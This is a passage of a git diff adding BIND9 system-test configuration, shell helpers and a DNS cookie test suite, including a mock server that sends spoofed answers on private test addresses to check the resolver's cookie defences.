$1, converting them to a format used by some system tests. +get_dig_xfer_stats() { + LOGFILE="$1" + sed -n "s/^;; XFR size: .*messages \([0-9][0-9]*\).*/messages=\1/p" "${LOGFILE}" + sed -n "s/^;; XFR size: \([0-9][0-9]*\) records.*/records=\1/p" "${LOGFILE}" + sed -n "s/^;; XFR size: .*bytes \([0-9][0-9]*\).*/bytes=\1/p" "${LOGFILE}" +} + +# get_named_xfer_stats: from named log file $1, extract transfer +# statistics for the last transfer for peer $2 and zone $3 (from a log +# message which has to contain the string provided in $4), converting +# them to a format used by some system tests. +get_named_xfer_stats() { + LOGFILE="$1" + PEER="`echo $2 | sed 's/\./\\\\./g'`" + ZONE="`echo $3 | sed 's/\./\\\\./g'`" + MESSAGE="$4" + grep " ${PEER}#.*${MESSAGE}:" "${LOGFILE}" | \ + sed -n "s/.* '${ZONE}\/.* \([0-9][0-9]*\) messages.*/messages=\1/p" | tail -1 + grep " ${PEER}#.*${MESSAGE}:" "${LOGFILE}" | \ + sed -n "s/.* '${ZONE}\/.* \([0-9][0-9]*\) records.*/records=\1/p" | tail -1 + grep " ${PEER}#.*${MESSAGE}:" "${LOGFILE}" | \ + sed -n "s/.* '${ZONE}\/.* \([0-9][0-9]*\) bytes.*/bytes=\1/p" | tail -1 +} + +# copy_setports - Copy Configuration File and Replace Ports +# +# Convenience function to copy a configuration file, replacing the tokens +# QUERYPORT, CONTROLPORT and EXTRAPORT[1-8] with the values of the equivalent +# environment variables. (These values are set by "run.sh", which calls the +# scripts invoking this function.) +# +# Usage: +# copy_setports infile outfile +# +copy_setports() { + # The indirect method of handling the substitution of the PORT variables + # (defining "atsign" then substituting for it in the "sed" statement) is + # required to prevent the "Configure" script (in the win32utils/ directory) + # from replacing the <at>PORT<at> substitution tokens when it processes + # this file and produces conf.sh. + atsign="@" + sed -e "s/${atsign}PORT${atsign}/${PORT}/g" \ + -e "s/${atsign}EXTRAPORT1${atsign}/${EXTRAPORT1}/g" \ + -e "s/${atsign}EXTRAPORT2${atsign}/${EXTRAPORT2}/g" \ + -e "s/${atsign}EXTRAPORT3${atsign}/${EXTRAPORT3}/g" \ + -e "s/${atsign}EXTRAPORT4${atsign}/${EXTRAPORT4}/g" \ + -e "s/${atsign}EXTRAPORT5${atsign}/${EXTRAPORT5}/g" \ + -e "s/${atsign}EXTRAPORT6${atsign}/${EXTRAPORT6}/g" \ + -e "s/${atsign}EXTRAPORT7${atsign}/${EXTRAPORT7}/g" \ + -e "s/${atsign}EXTRAPORT8${atsign}/${EXTRAPORT8}/g" \ + -e "s/${atsign}CONTROLPORT${atsign}/${CONTROLPORT}/g" \ + -e "s/${atsign}DEFAULT_ALGORITHM${atsign}/${DEFAULT_ALGORITHM}/g" \ + -e "s/${atsign}DEFAULT_ALGORITHM_NUMBER${atsign}/${DEFAULT_ALGORITHM_NUMBER}/g" \ + -e "s/${atsign}DEFAULT_BITS${atsign}/${DEFAULT_BITS}/g" \ + -e "s/${atsign}ALTERNATIVE_ALGORITHM${atsign}/${ALTERNATIVE_ALGORITHM}/g" \ + -e "s/${atsign}ALTERNATIVE_ALGORITHM_NUMBER${atsign}/${ALTERNATIVE_ALGORITHM_NUMBER}/g" \ + -e "s/${atsign}ALTERNATIVE_BITS${atsign}/${ALTERNATIVE_BITS}/g" \ + -e "s/${atsign}DEFAULT_HMAC${atsign}/${DEFAULT_HMAC}/g" \ + -e "s/${atsign}DISABLED_ALGORITHM${atsign}/${DISABLED_ALGORITHM}/g" \ + -e "s/${atsign}DISABLED_ALGORITHM_NUMBER${atsign}/${DISABLED_ALGORITHM_NUMBER}/g" \ + -e "s/${atsign}DISABLED_BITS${atsign}/${DISABLED_BITS}/g" \ + $1 > $2 +} diff --git a/bin/tests/system/conf.sh.in b/bin/tests/system/conf.sh.in new file mode 100644 index 0000000..d5b5996 --- /dev/null +++ b/bin/tests/system/conf.sh.in @@ -0,0 +1,131 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Common configuration data for system tests, to be sourced into +# other shell scripts. +# + +# Find the top of the BIND9 tree. +export TOP=@abs_top_builddir@ +export TOP_SRCDIR=@abs_top_srcdir@ + +# Provide TMPDIR variable for tests that need it. +export TMPDIR=${TMPDIR:-/tmp} + +# This is not the windows build. +export CYGWIN="" + +export ARPANAME=$TOP/bin/tools/arpaname +export CDS=$TOP/bin/dnssec/dnssec-cds +export CHECKCONF=$TOP/bin/check/named-checkconf +export CHECKDS=$TOP/bin/python/dnssec-checkds +export CHECKZONE=$TOP/bin/check/named-checkzone +export COVERAGE=$TOP/bin/python/dnssec-coverage +export DDNSCONFGEN=$TOP/bin/confgen/ddns-confgen +if [ -z "$TSAN_OPTIONS" ]; then # workaround for GL#4119 + export DELV=$TOP/bin/delv/delv + export RESOLVE=$TOP/bin/tests/system/resolve +else + export DELV=: + export RESOLVE=: +fi +export DIG=$TOP/bin/dig/dig +export DNSTAPREAD=$TOP/bin/tools/dnstap-read +export DSFROMKEY=$TOP/bin/dnssec/dnssec-dsfromkey +export FEATURETEST=$TOP/bin/tests/system/feature-test +export FSTRM_CAPTURE=@FSTRM_CAPTURE@ +export HOST=$TOP/bin/dig/host +export IMPORTKEY=$TOP/bin/dnssec/dnssec-importkey +export JOURNALPRINT=$TOP/bin/tools/named-journalprint +export KEYFRLAB=$TOP/bin/dnssec/dnssec-keyfromlabel +export KEYGEN=$TOP/bin/dnssec/dnssec-keygen +export KEYMGR=$TOP/bin/python/dnssec-keymgr +export MDIG=$TOP/bin/tools/mdig +export NAMED=$TOP/bin/named/named +export NSEC3HASH=$TOP/bin/tools/nsec3hash +export NSLOOKUP=$TOP/bin/dig/nslookup +export NSUPDATE=$TOP/bin/nsupdate/nsupdate +export NZD2NZF=$TOP/bin/tools/named-nzd2nzf +export PK11DEL="$TOP/bin/pkcs11/pkcs11-destroy -s ${SLOT:-0} -p ${HSMPIN:-1234} -w 0" +export PK11GEN="$TOP/bin/pkcs11/pkcs11-keygen -q -s ${SLOT:-0} -p ${HSMPIN:-1234}" +export PK11LIST="$TOP/bin/pkcs11/pkcs11-list -s ${SLOT:-0} -p ${HSMPIN:-1234}" +export REVOKE=$TOP/bin/dnssec/dnssec-revoke +export RNDC=$TOP/bin/rndc/rndc +export RNDCCONFGEN=$TOP/bin/confgen/rndc-confgen +export RRCHECKER=$TOP/bin/tools/named-rrchecker +export SETTIME=$TOP/bin/dnssec/dnssec-settime +export SIGNER=$TOP/bin/dnssec/dnssec-signzone +export TSIGKEYGEN=$TOP/bin/confgen/tsig-keygen +export VERIFY=$TOP/bin/dnssec/dnssec-verify +export WIRETEST=$TOP/bin/tests/wire_test + +export BIGKEY=$TOP/bin/tests/system/rsabigexponent/bigkey +export GENCHECK=$TOP/bin/tests/system/rndc/gencheck +export KEYCREATE=$TOP/bin/tests/system/tkey/keycreate +export KEYDELETE=$TOP/bin/tests/system/tkey/keydelete +export MAKEJOURNAL=$TOP/bin/tests/makejournal +export PIPEQUERIES=$TOP/bin/tests/system/pipelined/pipequeries + +# we don't want a KRB5_CONFIG setting breaking the tests +export KRB5_CONFIG=/dev/null +# use local keytab instead of default /etc/krb5.keytab +export KRB5_KTNAME=dns.keytab + +# Things that are different on Windows +export KILL=kill +export DIFF=diff +export DOS2UNIX=true +# There's no trailing period on Windows +export TP=. + +# Programs detected by configure +# Variables will be empty if no program was found by configure +export SHELL=@SHELL@ +export CURL=@CURL@ +export XMLLINT=@XMLLINT@ +export XSLTPROC=@XSLTPROC@ +export PYTEST=@PYTEST@ + +# Windows process management leave empty +export PSSUSPEND= + +# +# Interpreters for system tests detected by configure +# +export PERL=@PERL@ +if ! test -x "$PERL"; then + echo "Perl interpreter is required for system tests." + exit 77 +fi +export PYTHON=@PYTHON@ + +# +# Determine if we support various optional features. +# +export CRYPTO=@CRYPTO@ + + +# Load common values shared between windows and unix/linux. +. $TOP/bin/tests/system/conf.sh.common + +# +# Construct the lists of tests to run +# +SEQUENTIAL_UNIX="@PKCS11_TEST@" +SEQUENTIALDIRS="$SEQUENTIAL_COMMON $SEQUENTIAL_UNIX" + +PARALLEL_UNIX="@CHECKDS@ @COVERAGE@ @DNSTAP@ @KEYMGR@ cookie logfileconfig" +PARALLELDIRS="$PARALLEL_COMMON $PARALLEL_UNIX" + +SUBDIRS="$SEQUENTIALDIRS $PARALLELDIRS" diff --git a/bin/tests/system/conf.sh.win32 b/bin/tests/system/conf.sh.win32 new file mode 100644 index 0000000..95f9c16 --- /dev/null +++ b/bin/tests/system/conf.sh.win32 @@ -0,0 +1,129 @@ +#!/bin/sh +# +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Common configuration data for system tests, to be sourced into +# other shell scripts. +# + +# Find the top of the BIND9 tree. +TOP=${SYSTEMTESTTOP:=.}/../../.. + +# Make it absolute so that it continues to work after we cd. +export TOP=`cd $TOP && pwd` +export TOP_SRCDIR="$TOP" + +# This is the windows build. This disables certain tests cases +# and changes some specific behaviors where necessary. +export CYGWIN=1 + +# Visual Studio build configurations are Release and Debug +export VSCONF=${VSCONF:-Debug} + +# Interpreters for system tests +export PERL=/usr/bin/perl +if ! test -x "$PERL"; then + echo "Perl interpreter is required for system tests." + exit 77 +fi +export PYTHON=@PYTHON@ + + +export ARPANAME=$TOP/Build/$VSCONF/arpaname@EXEEXT@ +export CDS=$TOP/Build/$VSCONF/dnssec-cds@EXEEXT@ +export CHECKCONF=$TOP/Build/$VSCONF/named-checkconf@EXEEXT@ +export CHECKDS="$PYTHON `cygpath -w $TOP/bin/python/dnssec-checkds.py`" +export CHECKZONE=$TOP/Build/$VSCONF/named-checkzone@EXEEXT@ +export COVERAGE="$PYTHON `cygpath -w $TOP/bin/python/dnssec-coverage.py`" +export DDNSCONFGEN=$TOP/Build/$VSCONF/ddns-confgen@EXEEXT@ +export DELV=$TOP/Build/$VSCONF/delv@EXEEXT@ +export DIG=$TOP/Build/$VSCONF/dig@EXEEXT@ +export DNSTAPREAD=$TOP/Build/$VSCONF/dnstap-read@EXEEXT@ +export DSFROMKEY=$TOP/Build/$VSCONF/dnssec-dsfromkey@EXEEXT@ +export FEATURETEST=$TOP/Build/$VSCONF/feature-test@EXEEXT@ +export FSTRM_CAPTURE=@FSTRM_CAPTURE@ +export IMPORTKEY=$TOP/Build/$VSCONF/dnssec-importkey@EXEEXT@ +export JOURNALPRINT=$TOP/Build/$VSCONF/named-journalprint@EXEEXT@ +export KEYFRLAB=$TOP/Build/$VSCONF/dnssec-keyfromlabel@EXEEXT@ +export KEYGEN=$TOP/Build/$VSCONF/dnssec-keygen@EXEEXT@ +export KEYMGR="$PYTHON `cygpath -w $TOP/bin/python/dnssec-keymgr.py`" +export MDIG=$TOP/Build/$VSCONF/mdig@EXEEXT@ +export NAMED=$TOP/Build/$VSCONF/named@EXEEXT@ +export NSEC3HASH=$TOP/Build/$VSCONF/nsec3hash@EXEEXT@ +export NSLOOKUP=$TOP/Build/$VSCONF/nslookup@EXEEXT@ +export NSUPDATE=$TOP/Build/$VSCONF/nsupdate@EXEEXT@ +export NZD2NZF=$TOP/Build/$VSCONF/named-nzd2nzf@EXEEXT@ +export PK11DEL="$TOP/Build/$VSCONF/pkcs11-destroy@EXEEXT@ -s ${SLOT:-0} -p ${HSMPIN:-1234} -w 0" +export PK11GEN="$TOP/Build/$VSCONF/pkcs11-keygen@EXEEXT@ -q -s ${SLOT:-0} -p ${HSMPIN:-1234}" +export PK11LIST="$TOP/Build/$VSCONF/pkcs11-list@EXEEXT@ -s ${SLOT:-0} -p ${HSMPIN:-1234}" +export REVOKE=$TOP/Build/$VSCONF/dnssec-revoke@EXEEXT@ +export RNDC=$TOP/Build/$VSCONF/rndc@EXEEXT@ +export RNDCCONFGEN=$TOP/Build/$VSCONF/rndc-confgen@EXEEXT@ +export RRCHECKER=$TOP/Build/$VSCONF/named-rrchecker@EXEEXT@ +export SETTIME=$TOP/Build/$VSCONF/dnssec-settime@EXEEXT@ +export SIGNER=$TOP/Build/$VSCONF/dnssec-signzone@EXEEXT@ +export TSIGKEYGEN=$TOP/Build/$VSCONF/tsig-keygen@EXEEXT@ +export VERIFY=$TOP/Build/$VSCONF/dnssec-verify@EXEEXT@ + +# to port WIRETEST=$TOP/Build/$VSCONF/wire_test@EXEEXT@ +export WIRETEST= + +export BIGKEY=$TOP/Build/$VSCONF/bigkey@EXEEXT@ +export GENCHECK=$TOP/Build/$VSCONF/gencheck@EXEEXT@ +export KEYCREATE=$TOP/Build/$VSCONF/keycreate@EXEEXT@ +export KEYDELETE=$TOP/Build/$VSCONF/keydelete@EXEEXT@ +export MAKEJOURNAL=$TOP/Build/$VSCONF/makejournal@EXEEXT@ +export PIPEQUERIES=$TOP/Build/$VSCONF/pipequeries@EXEEXT@ +export RESOLVE=$TOP/Build/$VSCONF/resolve@EXEEXT@ + +# we don't want a KRB5_CONFIG setting breaking the tests +export KRB5_CONFIG=NUL + +# Things that are different on Windows +export KILL="/bin/kill -f" +export DIFF="diff --strip-trailing-cr" +export DOS2UNIX=dos2unix +# No trailing period +export TP= + +# Configure is launched from native environment, but tests are run in Cygwin - +# so any detection is unreliable. +export SHELL="/bin/bash -o igncr" +export CURL=/usr/bin/curl +export XMLLINT=/usr/bin/xmllint + +# +# PsSuspend is part of PSTools and can be downloaded from +# https://download.sysinternals.com/files/PSTools.zip +# +export PSSUSPEND=@PSSUSPEND@ + +# +# Determine if we support various optional features. +# +export CRYPTO=@CRYPTO@ + + +# The rest is shared between Windows and Unices +. $TOP/bin/tests/system/conf.sh.common + +# +# Construct the lists of tests to run +# +SEQUENTIAL_WINDOWS="" +SEQUENTIALDIRS="$SEQUENTIAL_COMMON $SEQUENTIAL_WINDOWS" + +PARALLEL_WINDOWS="@CHECKDS@ @COVERAGE@ @DNSTAP@ @KEYMGR@" +PARALLELDIRS="$PARALLEL_COMMON $PARALLEL_WINDOWS" + +SUBDIRS="$SEQUENTIALDIRS $PARALLELDIRS" diff --git a/bin/tests/system/conftest.py b/bin/tests/system/conftest.py new file mode 100644 index 0000000..8abf963 --- /dev/null +++ b/bin/tests/system/conftest.py @@ -0,0 +1,31 @@ +#!/usr/bin/python3 + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import os + +import pytest + + +@pytest.fixture(scope="session") +def named_port(): + return int(os.environ.get("PORT", default=5300)) + + +@pytest.fixture(scope="session") +def named_tlsport(): + return int(os.environ.get("TLSPORT", default=8853)) + + +@pytest.fixture(scope="session") +def control_port(): + return int(os.environ.get("CONTROLPORT", default=9953)) diff --git a/bin/tests/system/cookie/ans9/ans.py b/bin/tests/system/cookie/ans9/ans.py new file mode 100644 index 0000000..1266b7e --- /dev/null +++ b/bin/tests/system/cookie/ans9/ans.py @@ -0,0 +1,300 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +from __future__ import print_function +import os +import sys +import signal +import socket +import select +from datetime import datetime, timedelta +import time +import functools + +import dns +import dns.edns +import dns.flags +import dns.message +import dns.query +import dns.tsig +import dns.tsigkeyring +import dns.version + +from dns.edns import * +from dns.name import * +from dns.rcode import * +from dns.rdataclass import * +from dns.rdatatype import * +from dns.tsig import * + + +# Log query to file +def logquery(type, qname): + with open("qlog", "a") as f: + f.write("%s %s\n", type, qname) + + +# DNS 2.0 keyring specifies the algorithm +try: + keyring = dns.tsigkeyring.from_text( + { + "foo": {"hmac-sha256", "aaaaaaaaaaaa"}, + "fake": {"hmac-sha256", "aaaaaaaaaaaa"}, + } + ) +except: + keyring = dns.tsigkeyring.from_text({"foo": "aaaaaaaaaaaa", "fake": "aaaaaaaaaaaa"}) + +dopass2 = False + + +############################################################################ +# +# This server will serve valid and spoofed answers. A spoofed answer will +# have the address 10.53.0.10 included. +# +# When receiving a query over UDP: +# +# A query to "nocookie"/A will result in a spoofed answer with no cookie set. +# A query to "tcponly"/A will result in a spoofed answer with no cookie set. +# A query to "withtsig"/A will result in two responses, the first is a spoofed +# answer that is TSIG signed, the second is a valid answer with a cookie set. +# A query to anything else will result in a valid answer with a cookie set. +# +# When receiving a query over TCP: +# +# A query to "nocookie"/A will result in a valid answer with no cookie set. +# A query to anything else will result in a valid answer with a cookie set. +# +############################################################################ +def create_response(msg, tcp, first, ns10): + global dopass2 + m = dns.message.from_wire(msg, keyring=keyring) + qname = m.question[0].name.to_text() + lqname = qname.lower() + labels = lqname.split(".") + rrtype = m.question[0].rdtype + typename = dns.rdatatype.to_text(rrtype) + + with open("query.log", "a") as f: + f.write("%s %s\n" % (typename, qname)) + print("%s %s" % (typename, qname), end=" ") + + r = dns.message.make_response(m) + r.set_rcode(NOERROR) + if rrtype == A: + # exempt potential nameserver A records. + if labels[0] == "ns" and ns10: + r.answer.append(dns.rrset.from_text(qname, 1, IN, A, "10.53.0.10")) + else: + r.answer.append(dns.rrset.from_text(qname, 1, IN, A, "10.53.0.9")) + if not tcp and labels[0] == "nocookie": + r.answer.append(dns.rrset.from_text(qname, 1, IN, A, "10.53.0.10")) + if not tcp and labels[0] == "tcponly": + r.answer.append(dns.rrset.from_text(qname, 1, IN, A, "10.53.0.10")) + if first and not tcp and labels[0] == "withtsig": + r.answer.append(dns.rrset.from_text(qname, 1, IN, A, "10.53.0.10")) + dopass2 = True + elif rrtype == NS: + r.answer.append(dns.rrset.from_text(qname, 1, IN, NS, ".")) + elif rrtype == SOA: + r.answer.append(dns.rrset.from_text(qname, 1, IN, SOA, ". . 0 0 0 0 0")) + else: + r.authority.append(dns.rrset.from_text(qname, 1, IN, SOA, ". . 0 0 0 0 0")) + # Add a server cookie to the response + if labels[0] != "nocookie": + for o in m.options: + if o.otype == 10: # Use 10 instead of COOKIE + if first and labels[0] == "withtsig" and not tcp: + r.use_tsig( + keyring=keyring, + keyname=dns.name.from_text("fake"), + algorithm=HMAC_SHA256, + ) + elif labels[0] != "tcponly" or tcp: + cookie = o + if len(o.data) == 8: + cookie.data = o.data + o.data + else: + cookie.data = o.data + r.use_edns(options=[cookie]) + r.flags |= dns.flags.AA + return r + + +def sigterm(signum, frame): + print("Shutting down now...") + os.remove("ans.pid") + running = False + sys.exit(0) + + +############################################################################ +# Main +# +# Set up responder and control channel, open the pid file, and start +# the main loop, listening for queries on the query channel or commands +# on the control channel and acting on them. +############################################################################ +ip4_addr1 = "10.53.0.9" +ip4_addr2 = "10.53.0.10" +ip6_addr1 = "fd92:7065:b8e:ffff::9" +ip6_addr2 = "fd92:7065:b8e:ffff::10" + +try: + port = int(os.environ["PORT"]) +except: + port = 5300 + +query4_udp1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +query4_udp1.bind((ip4_addr1, port)) +query4_tcp1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +query4_tcp1.bind((ip4_addr1, port)) +query4_tcp1.listen(1) +query4_tcp1.settimeout(1) + +query4_udp2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +query4_udp2.bind((ip4_addr2, port)) +query4_tcp2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +query4_tcp2.bind((ip4_addr2, port)) +query4_tcp2.listen(1) +query4_tcp2.settimeout(1) + +havev6 = True +query6_udp1 = None +query6_udp2 = None +query6_tcp1 = None +query6_tcp2 = None +try: + query6_udp1 = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + query6_udp1.bind((ip6_addr1, port)) + query6_tcp1 = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) + query6_tcp1.bind((ip6_addr1, port)) + query6_tcp1.listen(1) + query6_tcp1.settimeout(1) + + query6_udp2 = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + query6_udp2.bind((ip6_addr2, port)) + query6_tcp2 = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) + query6_tcp2.bind((ip6_addr2, port)) + query6_tcp2.listen(1) + query6_tcp2.settimeout(1) +except: + if query6_udp1 != None: + query6_udp1.close() + if query6_tcp1 != None: + query6_tcp1.close() + if query6_udp2 != None: + query6_udp2.close() + if query6_tcp2 != None: + query6_tcp2.close() + havev6 = False + +signal.signal(signal.SIGTERM, sigterm) + +f = open("ans.pid", "w") +pid = os.getpid() +print(pid, file=f) +f.close() + +running = True + +print("Using DNS version %s" % dns.version.version) +print("Listening on %s port %d" % (ip4_addr1, port)) +print("Listening on %s port %d" % (ip4_addr2, port)) +if havev6: + print("Listening on %s port %d" % (ip6_addr1, port)) + print("Listening on %s port %d" % (ip6_addr2, port)) +print("Ctrl-c to quit") + +if havev6: + input = [ + query4_udp1, + query6_udp1, + query4_tcp1, + query6_tcp1, + query4_udp2, + query6_udp2, + query4_tcp2, + query6_tcp2, + ] +else: + input = [query4_udp1, query4_tcp1, query4_udp2, query4_tcp2] + +while running: + try: + inputready, outputready, exceptready = select.select(input, [], []) + except select.error as e: + break + except socket.error as e: + break + except KeyboardInterrupt: + break + + for s in inputready: + ns10 = False + if s == query4_udp1 or s == query6_udp1 or s == query4_udp2 or s == query6_udp2: + if s == query4_udp1 or s == query6_udp1: + print( + "UDP Query received on %s" + % (ip4_addr1 if s == query4_udp1 else ip6_addr1), + end=" ", + ) + if s == query4_udp2 or s == query6_udp2: + print( + "UDP Query received on %s" + % (ip4_addr2 if s == query4_udp2 else ip6_addr2), + end=" ", + ) + ns10 = True + # Handle incoming queries + msg = s.recvfrom(65535) + dopass2 = False + rsp = create_response(msg[0], False, True, ns10) + print(dns.rcode.to_text(rsp.rcode())) + s.sendto(rsp.to_wire(), msg[1]) + if dopass2: + print("Sending second UDP response without TSIG", end=" ") + rsp = create_response(msg[0], False, False, ns10) + s.sendto(rsp.to_wire(), msg[1]) + print(dns.rcode.to_text(rsp.rcode())) + + if s == query4_tcp1 or s == query6_tcp1 or s == query4_tcp2 or s == query6_tcp2: + try: + (cs, _) = s.accept() + if s == query4_tcp1 or s == query6_tcp1: + print( + "TCP Query received on %s" + % (ip4_addr1 if s == query4_tcp1 else ip6_addr1), + end=" ", + ) + if s == query4_tcp2 or s == query6_tcp2: + print( + "TCP Query received on %s" + % (ip4_addr2 if s == query4_tcp2 else ip6_addr2), + end=" ", + ) + ns10 = True + # get TCP message length + buf = cs.recv(2) + length = struct.unpack(">H", buf[:2])[0] + # grep DNS message + msg = cs.recv(length) + rsp = create_response(msg, True, True, ns10) + print(dns.rcode.to_text(rsp.rcode())) + wire = rsp.to_wire() + cs.send(struct.pack(">H", len(wire))) + cs.send(wire) + cs.close() + except s.timeout: + pass + if not running: + break diff --git a/bin/tests/system/cookie/bad-cookie-badaes.conf b/bin/tests/system/cookie/bad-cookie-badaes.conf new file mode 100644 index 0000000..7d8cfe3 --- /dev/null +++ b/bin/tests/system/cookie/bad-cookie-badaes.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + cookie-algorithm aes; + cookie-secret "ebc7701beabb4a40c57d140eeb6733faaa"; // 136 bits +}; diff --git a/bin/tests/system/cookie/bad-cookie-badhex.conf b/bin/tests/system/cookie/bad-cookie-badhex.conf new file mode 100644 index 0000000..43c11ad --- /dev/null +++ b/bin/tests/system/cookie/bad-cookie-badhex.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + cookie-secret "012345678901234567890123456789012345678901234567890123456789012"; +}; diff --git a/bin/tests/system/cookie/bad-cookie-badsiphash24.conf b/bin/tests/system/cookie/bad-cookie-badsiphash24.conf new file mode 100644 index 0000000..25ff78f --- /dev/null +++ b/bin/tests/system/cookie/bad-cookie-badsiphash24.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + cookie-algorithm siphash24; + cookie-secret "ebc7701beabb4a40c57d140eeb6733faaabbccdd"; // 160 bits +}; diff --git a/bin/tests/system/cookie/bad-cookie-toolong.conf b/bin/tests/system/cookie/bad-cookie-toolong.conf new file mode 100644 index 0000000..5ea67b9 --- /dev/null +++ b/bin/tests/system/cookie/bad-cookie-toolong.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + cookie-secret "01234567890123456789012345678901234567890123456789012345678901234567890"; +}; diff --git a/bin/tests/system/cookie/clean.sh b/bin/tests/system/cookie/clean.sh new file mode 100644 index 0000000..2c10757 --- /dev/null +++ b/bin/tests/system/cookie/clean.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns*/named.conf +rm -f dig.out.* +rm -f named.run.* +rm -f rndc.out.* +rm -f ns1/named_dump.db* +rm -f ns*/named.memstats +rm -f ns*/named.run +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* +rm -f ns*/named.run.prev +rm -f ans*/ans.run ans*/ans.log ans*/query.log diff --git a/bin/tests/system/cookie/good-cookie-aes.conf b/bin/tests/system/cookie/good-cookie-aes.conf new file mode 100644 index 0000000..97a6f67 --- /dev/null +++ b/bin/tests/system/cookie/good-cookie-aes.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + cookie-algorithm aes; + cookie-secret "ebc7701beabb4a40c57d140eeb6733fa"; // 128 bits +}; diff --git a/bin/tests/system/cookie/good-cookie-siphash24.conf b/bin/tests/system/cookie/good-cookie-siphash24.conf new file mode 100644 index 0000000..c937d71 --- /dev/null +++ b/bin/tests/system/cookie/good-cookie-siphash24.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + cookie-algorithm siphash24; + cookie-secret "ebc7701beabb4a40c57d140eeb6733fa"; // 128 bits +}; diff --git a/bin/tests/system/cookie/ns1/example.db b/bin/tests/system/cookie/ns1/example.db new file mode 100644 index 0000000..75a6d3c --- /dev/null +++ b/bin/tests/system/cookie/ns1/example.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ SOA ns1 hostmaster.isc.org. 1 600 600 1200 600 +@ NS ns1 +ns1 A 10.53.0.1 +large TXT ( large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large + large large large large large large large large ) diff --git 